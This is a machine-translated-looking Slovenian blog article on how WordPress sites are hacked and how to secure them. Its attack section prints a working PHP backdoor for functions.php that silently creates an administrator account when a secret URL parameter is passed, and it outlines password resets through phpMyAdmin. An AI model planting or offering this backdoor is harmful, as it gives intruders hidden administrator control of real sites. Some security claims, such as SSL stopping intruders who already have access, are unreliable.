• WordPress

Kako vdreti v WordPress?

  • Felix Rose-Collins
  • 8 min read
Kako vdreti v WordPress?

Uvod

Pred začetkom tega članka bi radi, da veste, da je hekanje nezakonito in da ne spodbujamo in ne motiviramo zlonamernih dejavnosti. Ta članek je namenjen izključno pridobivanju znanja o tem, kako delujejo prevaranti in kako so različne metode varovanja spletnih mest bistvene za njihovo preprečevanje. Pogovorimo se o tem:

  • Kako prevaranti vdrejo v WordPress?
  • Kako zavarovati spletno mesto WP pred prevaranti?

Brez nadaljnjega se lotimo teme.

Kako kramp WordPress spletne strani Online?

How to Hack WordPress Website Online (Vir: wpsecurityninja.com)

Uporaba WPScan:

WPScan je WP varnostni skener, ki pomaga lastnikom spletnih mest, da preverijo svoje WordPress mesto za ranljivosti, vendar je ta skener uporablja tudi hekerji za izpolnjevanje svojih motivov, da hack spletnih mest.

WPScan omogoča lastnikom in skrbnikom spletnih mest, da določijo uporabniške račune WP in gesla z grobo silo, ki so najpomembnejši korak pri pridobivanju nepooblaščenega dostopa do računov WP.

Brute force username and password using WPScan (Brute force uporabniškega imena in gesla s programom WPScan. Vir: Medium)

Napadi MIM:

Napade MIM (Man-in-middle) je mogoče zlahka izvesti v primeru uporabnikov, ki uporabljajo podobna omrežja LAN. Nešifrirane prijave uporabnikov so lahka tarča, saj so vse podrobnosti vidne v navadnem besedilu.

Programska oprema, ki je vključena v te vrste napadov, lahko zazna ogrožene teme in vtičnike ter našteje uporabnike.

MIM Attacks (Vir: Medium)

Vbodi SQL:

Napadi z vbrizgavanjem SQL veljajo za najbolj znane napade, ki se uporabljajo za vdor v spletna mesta. Ti napadi so usmerjeni na zaledne prehode spletnega mesta in omogočajo hekerjem, da vanje prodrejo z izvajanjem kompromitiranih ukazov.

SQL Injections (Vir: secure.wphackedhelp.com)

Spoznajte Ranktracker

Platforma "vse v enem" za učinkovito SEO

Za vsakim uspešnim podjetjem stoji močna kampanja SEO. Vendar je ob neštetih orodjih in tehnikah optimizacije težko vedeti, kje začeti. Ne bojte se več, ker imam za vas prav to, kar vam lahko pomaga. Predstavljam platformo Ranktracker vse-v-enem za učinkovito SEO

Končno smo odprli registracijo za Ranktracker popolnoma brezplačno!

Ustvarite brezplačen račun

Ali se prijavite s svojimi poverilnicami

Ti vdori hekerjem omogočajo tudi spreminjanje podatkovnih zbirk in ukazov ter brisanje ali krajo informacij o spletnem mestu.

Ker ti napadi SQL odkrivajo ranljiva in nezakrpana spletna mesta, je vdor vanje lahek in uspešen.

Uporaba My SQL/cPanel:

Pri tej metodi hekerji ustvarijo lažni račun ali spremenijo geslo trenutnega uporabnika spletnega mesta WP. Hekerji poskušajo prodreti prek nadzorne plošče cPanel z odprtjem programa PhpMyAdmin. Poiščejo tabelo, ki se konča z _users, in poiščejo uporabnika, ki ga želijo spremeniti.

Tako bodo lahko spremenili poverilnice uporabnika, v katerega nameravajo vdreti. Izsledijo uporabnika in spremenijo njegovo geslo (iz polja user_pass) tako, da odprejo spletni generator MD5 in ga nadomestijo z želenim ter nato kliknejo #.

Utilizing My SQL/cPanel (Uporabniška imena, gesla uporabnikov, njihova e-poštna imena itd. so shranjena v tabeli zbirke podatkov wp_users. Vir: firstsiteguide.com)

Uporabniška imena, gesla uporabnikov, njihova e-poštna imena itd. so shranjeni v tabeli zbirke podatkov wp_users.

Urejanje datoteke Functions.php:

Hekerji dostopajo tudi do nadzorne plošče cPanel in spreminjajo datoteko Functions.php. Z odklepanjem upravitelja datotek poiščejo mapo aktivne teme. V mapi public_html/wp_content/themes izsledijo temo in uredijo datoteko functions.php tako, da vanjo namestijo svojo kompromitirano kodo. Vdor je že v teku, saj so hekerji ustvarili nov račun. Ko to storijo, izbrišejo kompromitirano kodo.

Ustvarite nov uporabniški račun prek protokola FTP:

Na splošno računi FTP pomagajo lastnikom spletišč ustvariti imenik na spletnem mestu, ki določenim uporabnikom omogoča nalaganje/prevzemanje datotek z uporabo njihovih prijavnih podatkov.

Te datoteke si lahko ogledate tudi na internetu.

Koraki za ustvarjanje računa FTP na spletnem mestu:

  • Vnesite želene podatke
  • Vnesite uporabniško ime novega uporabnika FTP
  • Vnesite geslo za dodelitev računa za dostop prek FTP
  • Vnesite ime imenika, do katerega želite omogočiti dostop prek protokola FTP.
  • Napišite želeni MB prostora, ki ga želite dodeliti tej mapi.
  • Nato pritisnite gumb " Ustvari", da ustvarite nov račun.

Novi uporabnik mora za dostop prek FTP naložiti spodaj navedene podatke.


Naslov / Ime gostitelja / Naslov: yourdomain.com ali ftp.yourdomain.com Uporabnik / Uporabnik: user@yourdomain.com Geslo: El geslo, dodeljeno temu računu FTP

Pristanišče: 21Ime mape za nalaganje/prevzemanje datotek.


Novi uporabnik bo imel dovoljenja za branje in pisanje v izbranem imeniku in vseh podimenikih, ki jih vsebuje. Če na primer ustvarite uporabnika odjemalca in mu omogočite dostop do imenika / home / user / public_html

Prodor skozi zadnja vrata:

Zlonameren način prodora v spletno mesto je prek zadnjih vrat. Ne glede na to, ali gre za goljufa, ki želi pridobiti dostop do vašega spletnega mesta, ali uporabnika žrtve, ki želi ponovno pridobiti dostop do svojega spletnega mesta prek vstopa skozi zadnja vrata, morata oba slediti spodnjim korakom.

Spoznajte Ranktracker

Platforma "vse v enem" za učinkovito SEO

Za vsakim uspešnim podjetjem stoji močna kampanja SEO. Vendar je ob neštetih orodjih in tehnikah optimizacije težko vedeti, kje začeti. Ne bojte se več, ker imam za vas prav to, kar vam lahko pomaga. Predstavljam platformo Ranktracker vse-v-enem za učinkovito SEO

Končno smo odprli registracijo za Ranktracker popolnoma brezplačno!

Ustvarite brezplačen račun

Ali se prijavite s svojimi poverilnicami

V primerih, ko je prek protokola FTP ustvarjen nov uporabniški račun ali ponastavljeno geslo, vendar to ne da želenih rezultatov, lahko uporabnik želi vdreti v svoje spletno mesto prek vstopa skozi zadnja vrata in pridobiti upraviteljski dostop.

Koraki za ustvarjanje zaklonišča:

  • Odprite datoteko functions.php in prilepite spodnjo kodo.
add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
  • Kasneje shranite spremembe.

Crypto Jacking in rudarjenje kriptovalut:

Zaradi priljubljenosti kriptovalut so se pojavile nove kibernetske grožnje, kot je vdor kriptovalut, ki se imenuje tudi zlonamerna programska oprema za rudarjenje kriptovalut.

Odvzem računalnika proti uporabnikovi volji in zavesti se imenuje kriptografski vdor (crypto-jacking). Pri zlonamerni programski opremi crypto-jacking goljufi okužijo uporabnikov računalnik z zlonamerno programsko opremo, ki jo dostavijo prek programske opreme za kompromitiranje sistemov in omrežij.

Goljufanje:

Pri ribarjenju gre za metodo, pri kateri goljufi uporabnikom odtujijo njihove občutljive podatke (prijavne podatke, številko socialnega računa, kodo PIN, podatke o kreditni kartici itd.) tako, da se izdajajo za pravne osebe. Za izpolnitev svojega namena se običajno zatečejo k e-poštnim sporočilom.

Primer: Prevarant se lahko izdaja za zanesljiv vir in zbira osebne podatke uporabnikov, da bi izpolnil svoje želje. Prav tako lahko v goljufivo e-poštno sporočilo vnese slabo povezavo in jih usmeri na neko goljufivo spletno mesto, kjer jim dostavi zlonamerno programsko opremo.

Zlonamerna programska oprema:

Varnostna statistika WordPressa kaže, da je 4000 spletnih mest WP okuženih z zlonamerno programsko opremo zaradi lažnih vtičnikov SEO.

Prevaranti za prenos zlonamerne programske opreme ne potrebujejo vira. Vtičniki SEO, teme WP in številni drugi dejavniki, prisotni na spletnem mestu, so hekerje spodbudili k uporabi nedavne zlonamerne programske opreme WP-VCD.

Tudi lažna e-poštna sporočila so vrata za prenos zlonamerne programske opreme.

Tudi v tem primeru je cilj hekerjev enak, tj. z vdorom v sisteme in krajo informacij od uporabnikov pridobiti občutljive podatke.

WordPress Ransomware:

Pri izsiljevalski programski opremi WP hekerji z zlonamerno programsko opremo blokirajo dostop uporabnikov do sistemov in omrežij. Uporabnik ga lahko obnovi tako, da plača odkupnino, ki jo zahteva heker.

Primer: Napad Petya, v katerem heker zašifrira vaše datoteke in podatke ter zahteva odkupnino za dešifrirni ključ.

Napad s križnim pisanjem na spletnem mestu (XSS):

Napade XSS hekerji izvajajo tako, da v spletno mesto vnesejo zlonamerno vsebino in tako izkoristijo brskalnik. Ta napad hekerju omogoča krajo podatkov iz piškotkov, spreminjanje vsebine spletnega mesta in prevzem spletnega mesta za pridobivanje občutljivih podatkov.

Vdiranje klikov:

Pri vdoru s klikom heker zlonamerno poskuša ogroziti gumb/povezavo in uporabnika spodbudi, da klikne na ogroženi predmet. To hekerju omogoči izvajanje zlonamernih ukazov za pridobitev dostopa do uporabniško občutljivih podatkov.

Spoofing:

Prikrivanje je napad, pri katerem se oseba preobleče v zaupanja vredno identiteto, da bi pridobila nezakonito korist za uporabnika in ga prepričala, da predloži svoje zaupne podatke.

Da bi preprečili vse te hekerske napade, je treba sprejeti posebne varnostne ukrepe za zaščito spletnega mesta WP.

Kako zavarovati spletno stran WordPress pred vdori?

How to Secure WordPress Website from Hacking? (Vir: envisagedigital.co.uk)

Zgornji statistični podatki zadostujejo za prikaz priljubljenosti WordPressa. Zaradi te priljubljenosti je ta platforma CMS bolj zaželena med hekerji, ki poskušajo z različnimi metodami vdora pridobiti dostop do spletnih mest WP in njihovih podatkov.

Zato je treba vedeti, kako hekerjem preprečiti dostop do vašega spletnega mesta WP.

Zagotovite svojo WP stran s SSL certifikatom:

Ko se na spletnem mestu naložijo kakršni koli podatki, so ti vedno v navadnem besedilu, ki je zlahka vidno vsem, tudi hekerjem. To je lahko tvegano, saj lahko hekerji zlorabijo podatke vašega spletnega mesta.

Certifikati SSL (Secure Socket Layers ) so tisti digitalni certifikati, ki pomagajo pri varovanju vašega spletnega mesta WP z 256-bitnim šifriranjem in tako pretvorijo podatke vašega spletnega mesta v kodirano obliko.

Hekerji ne morejo brati kod, čeprav so pridobili dostop do vašega spletnega mesta, zato so prisiljeni zapustiti takšna spletna mesta.

Secure your WP site with SSL Certificate (Vir: clickssl.net)

Izberite želeno znamko certifikata SSL (Comodo, Thawte, RapidSSL itd.) in ga namestite na spletno mesto WP. Pri vrsti certifikata SSL morate razumeti domene in poddomene. Če ima na primer vaše spletno mesto WP poddomene, lahko z enim samim poceni certifikatom Wildcard, ki stane približno 45 USD na leto, zaščitite celotno digitalno poslovanje.

Hitra izdaja, 2048-bitno šifriranje ključa, povečanje SEO, pečat zaupanja spletnega mesta, 99-odstotna združljivost z brskalniki/mobilnimi napravami, politika vračil in garancija so le nekatere od značilnosti in prednosti namestitve potrdil SSL Wildcard.

Različne blagovne znamke in možnosti izdelkov SSL, cenovno ugodne cene in odlična storitev za stranke so le nekatere od prednosti, ki jih ima trgovina ClickSSL pri varovanju vašega spletnega mesta WP.

Posodobite svoje zaposlene:

Človeške napake so lahko pogubne, zato poskrbite, da bodo vaši zaposleni obveščeni o najnovejših kibernetskih grožnjah, da ne bodo ranljivi.

Če lahko vaši zaposleni že v začetni fazi izsledijo sumljive znake vdrtega spletnega mesta, lahko o tem obvestijo pristojne in preprečijo nadaljnjo škodo na vašem spletnem mestu in podjetju.

Uporabite dvofaktorsko preverjanje pristnosti (2FA):

Izvajanje postopka 2FA med prijavo v spletno mesto je najpomembnejši način za preprečevanje napadov z grobo silo. Poleg tega, da dodajo še eno stopnjo varnosti, preprečujejo tudi podatke o spletnem mestu in uporabniku.

Če je namreč ogrožena ena varnostna plast, mora goljuf za dostop do spletnega mesta vdreti v drugo plast.

To je težka odločitev, zato se v večini primerov prevaranti preselijo na druga slabo zavarovana spletna mesta.

Nasvet: WP 2FA je brezplačen vtičnik za WP, ki zagotavlja dodatno varnostno plast vašega spletnega mesta WP.

Redno preverjajte skrbniške uporabnike:

To je pomembno za varnost vašega spletnega mesta WP. Poskrbite, da boste redno preverjali uporabnike upravitelja in navzkrižno preverjali njihove dostope.

Zagotovite tudi, da imajo uporabniki in zaposleni omejen dostop glede na svoje naloge, da preprečite varnostne pomanjkljivosti.

Redno posodabljajte jedro WordPressa:

Ne poznate WP Core?

Naj vam na kratko povem, da WP Core vključuje vse osnovne temeljne datoteke, ki so potrebne za delovanje WP.

Seznam datotek v WP zip datoteki, preneseni s spletišča WordPress.org

Update WordPress Core Regularly (Vir: ithemes.com)

Te osnovne datoteke je treba redno posodabljati po izdaji varnostnih posodobitev, da se popravijo vse varnostne ranljivosti.

Prenesite WP teme in vtičnike iz zanesljivih virov:

To je ključnega pomena, saj so lahko vtičniki nevarni, če niso posodobljeni ali so nameščeni iz nezaupljivih virov. Pri uporabi brezplačnih/plačljivih vtičnikov vedno preverite spodaj navedene dejavnike, kot so:

  • Ocene in pregledi uporabnikov
  • Priročnost za uporabnika
  • Združljivost
  • Varnost
  • Zanesljivost

Download WP Themes & Plugins from Trustworthy Sources (Vir: torquemag.io)

Enako pravilo velja tudi za nameščanje tem WP.

Redno posodabljajte WP teme in vtičnike:

Zastarele ali pretečene WP teme in vtičniki vedno predstavljajo nevarnost za vaše WP spletno mesto, saj izgubijo svoje varnostne standarde. Če želite hekerjem preprečiti uporabo takšnih vrat za širjenje zlonamerne programske opreme za dostop do spletnega mesta, redno posodabljajte teme in vtičnike, ki jih uporabljate na svojem spletnem mestu WP.

Tako bo vtičnik pravilno deloval in bo sinhroniziran z najnovejšimi različicami sistema WP.

Nasvet: Na strani z vtičniki si lahko ogledate vse nameščene vtičnike in ob vsakem vtičniku povezavo "Omogoči samodejne posodobitve". Vklopite jo za samodejne posodobitve.

Spremenite privzeto ime skrbnika:

Hekerji so preveč pametni in z uporabo privzetega imena upravitelja zlahka prodrejo na vaše spletno mesto WP. Vedno je bolje spremeniti privzeto uporabniško ime upravitelja, da bi hekerjem preprečili izvajanje napadov z grobo silo za pridobitev nepooblaščenega dostopa do vašega spletnega mesta.

Odobritev omejenega dostopa:

Nikoli ne dajte več, kot je potrebno, enako pravilo pa velja tudi za odobritev dostopa do spletnega mesta uporabnikom in zaposlenim.

Nadzor dostopa je najpomembnejše pravilo varnosti spletnega mesta in podatkov, saj določa, kdo lahko dostopa do spletnega mesta in kdo ne. Za varnost spletnega mesta blokirajte vse dostope do upravitelja WP ter drugih kritičnih kod in podatkov.

Z omejenim dostopom ne izboljšate le produktivnosti, temveč tudi zaščitite svoje spletno mesto pred zlonamernimi vnosi.

Posodobite WordPress:

Če WordPress ni posodobljen, obstaja nevarnost, da vaše spletno mesto napadejo hekerji.

WordPress ima 37-odstotni tržni delež in redno objavlja posodobitve, s katerimi odpravlja varnostne luknje in hrošče. Te posodobitve vključujejo tudi nove funkcije in izboljšave obstoječih, ki so koristne za izboljšanje delovanja vašega spletnega mesta.

Spoznajte Ranktracker

Platforma "vse v enem" za učinkovito SEO

Za vsakim uspešnim podjetjem stoji močna kampanja SEO. Vendar je ob neštetih orodjih in tehnikah optimizacije težko vedeti, kje začeti. Ne bojte se več, ker imam za vas prav to, kar vam lahko pomaga. Predstavljam platformo Ranktracker vse-v-enem za učinkovito SEO

Končno smo odprli registracijo za Ranktracker popolnoma brezplačno!

Ustvarite brezplačen račun

Ali se prijavite s svojimi poverilnicami

Why you should always update your wordpress (Vir: wpbeginner.com)

Posodabljajte svoje spletno mesto WP za zanesljivo varnost.

Zaključek:

Uporabljajte močna in zapletena gesla ter posodabljajte spletno mesto WP ter vtičnike in teme, da odpravite vse varnostne pomanjkljivosti. Vzemite si čas za izobraževanje zaposlenih, saj bo to vedno pomagalo pri preprečevanju nesreč.

Nikoli ne izgubite varnosti in vedno poskrbite za uporabo najboljših in zaupanja vrednih varnostnih vtičnikov, da bo vaše spletno mesto WP varno pred radovednimi očmi. Poleg tega svoje spletno mesto zavarujte s protokolom SSL, da povečate zaupanje strank, posel in SEO.

Zdaj, ko se zavedate, kako delujejo hekerji, upamo, da vam bo ta članek pomagal pri preprečevanju vdora hekerjev na vaše spletno mesto in pri varnem upravljanju vašega spletnega mesta WP.

Felix Rose-Collins

Felix Rose-Collins

Ranktracker's CEO/CMO & Co-founder

Felix Rose-Collins is the Co-founder and CEO/CMO of Ranktracker. With over 15 years of SEO experience, he has single-handedly scaled the Ranktracker site to over 500,000 monthly visits, with 390,000 of these stemming from organic searches each month.

Začnite uporabljati Ranktracker... brezplačno!

Ugotovite, kaj preprečuje uvrstitev vašega spletnega mesta.

Ustvarite brezplačen račun

Ali se prijavite s svojimi poverilnicami

Different views of Ranktracker app